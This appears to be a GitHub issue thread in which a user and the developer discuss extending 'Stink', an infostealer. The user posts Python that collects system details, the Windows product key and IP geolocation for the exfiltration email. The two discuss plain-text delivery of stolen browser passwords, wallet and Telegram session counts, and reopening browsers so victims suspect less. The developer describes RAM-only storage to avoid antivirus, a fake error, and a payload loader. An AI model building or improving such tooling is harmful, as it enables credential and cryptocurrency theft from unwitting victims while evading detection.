Summary of the collected data and browser back opening

[jamiekarvans]

hey thanx for the updates, i really like how well you're expanding the application here are some suggestions i think would be nice to implant:

1. after Stink finished its job, open back all the closed browsers so make less suspicion and look more real

2. add some info and summery of what is grabbed to sender for example for email sender:

       computerOS = subprocess.run('wmic os get Caption', capture_output=True, shell=True).stdout.decode(
           errors='ignore').strip().splitlines()
       computerOS = computerOS[2].strip() if len(computerOS) >= 2 else 'Unable to detect OS'
       totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', capture_output=True,
                                    shell=True).stdout.decode(errors='ignore').strip().split()
       totalMemory = str(int(int(totalMemory[1]) / 1000000000)) + ' GB' if len(
           totalMemory) >= 1 else 'Unable to detect total memory'
       uuid = subprocess.run('wmic csproduct get uuid', capture_output=True, shell=True).stdout.decode(
           errors='ignore').strip().split()
       uuid = uuid[1].strip() if len(uuid) >= 1 else 'Unable to detect UUID'
       cpu = subprocess.run(
           "powershell Get-ItemPropertyValue -Path 'HKLM:System\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name PROCESSOR_IDENTIFIER",
           capture_output=True, shell=True).stdout.decode(errors='ignore').strip() or 'Unable to detect CPU'
       gpu = subprocess.run('wmic path win32_VideoController get name', capture_output=True, shell=True).stdout.decode(
           errors='ignore').splitlines()
       gpu = gpu[2].strip() if len(gpu) >= 2 else 'Unable to detect GPU'
       productKey = subprocess.run(
           "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
           capture_output=True, shell=True).stdout.decode(errors='ignore').strip() or 'Unable to get product key'
       http = PoolManager(cert_reqs='CERT_NONE')
       try:
           r: dict = json.loads(
               http.request('GET', 'http://ip-api.com/json/?fields=225545').data.decode(errors='ignore'))
           if r.get('status') != 'success':
               raise Exception('Failed')
           data = f"\nIP: {r['query']}\nRegion: {r['regionName']}\nCountry: {r['country']}\nTimezone: {r['timezone']}\n\n{'Cellular Network:'.ljust(20)} {(chr(9989) if r['mobile'] else chr(10062))}\n{'Proxy/VPN:'.ljust(20)} {(chr(9989) if r['proxy'] else chr(10062))}"
           if len(r['reverse']) != 0:
               data += f"\nReverse DNS: {r['reverse']}"
       except Exception:
           ipinfo = '(Unable to get IP info)'
       else:
           ipinfo = data
       system_info = f'Computer Name: {computerName}\nComputer OS: {computerOS}\nTotal Memory: {totalMemory}\nUUID: {uuid}\nCPU: {cpu}\nGPU: {gpu}\nProduct Key: {productKey}'
           pmessage = f'System: {os.getlogin()}\nIP Info\n{ipinfo}\nSystem Info\n{system_info}'.strip()

   then add message.set_content(pmessage) to email class ps: i didn't know where is the working directory (where is it btw?) but would be nice to iterate over grabbed data also add the number of grabbed telegram sessions and wallets to the email as well to know if it's even added or not, for example: Telegram Sessions : 1 Wallets : 4 and if browser is not grabbed or any other data, it would be nicer to not even include that in the email text at all instead of showing 0 is grabbed (for easier indexing and searching through emails and finding the ones that include the searched data)

3. add grabbed Browser Passwords to grabbed info as plain text in email aswell to organize better the data and search easier through grabbed info without the need to open each zip file and look for if data is grabbed.

and again thanx and nice job on your new works.

[FallenAstaroth]

Hi, thank you)

1) I was thinking about opening browsers back after shutdown, but tabs etc are not saved and you still have to click "Restore" button. But in principle it can be added. 2) Ok, I'll add that the email should contain the results of the collection. 3) By working directory do you mean where it saves the collected data? If yes, then nowhere, all collected data is stored in RAM, then it forms an archive in RAM and sends it to wherever it needs to go. stink does not create any temporary files while working.

[FallenAstaroth]

Preview of collected data added since version 4.6.0.

[jamiekarvans]

an amazing job, again.

there were a few thing i was facing:

1. edit: the script by default throws an error and on some os systems makes the error keep looping and hangs up the system , here is the error : error_crc: Data error (clynic redundancy check).

2. also in my tests stink crashes and exists if internet connection is not up during sending data, i think it would be nice to wait for internet connection before doing any internet related behaviors?

3. just an enhancement: the Crypto Wallets are password protected, i think it would be nice and also good practice to have an option to wait for an app or process to start and then start capturing KeyStrokes, (for wallets EXEs for example or certain websites)

4. and lastly one question, i'm just curious why not creating temp files? are you avoiding touching the disk for AV triggers or ...?

[FallenAstaroth]

Thank you.

1. It's a fake error. I forgot to remove the auto power on. Now it will appear only if you specify it in the parameters. What do you mean by "error keeps looping and hangs up the system"?

2. Good idea, I'll add it.

3. This is usually done by other people who have the equipment and so on. It's already a keylogger, and the stealer job is just to collect the data and send it. If you want to, you can load a third-party keylogger via the built-in loader.

4. Initially it did, but I decided that it would be better to store everything in memory than to create a directory with files.

[jamiekarvans]

hey long time no see, how you've been doing? i was just testing around with the code and i realized it doesn't grab firefox passwords and cookies also do you think you can use the same system password to get the backup codes from authenticator extension files?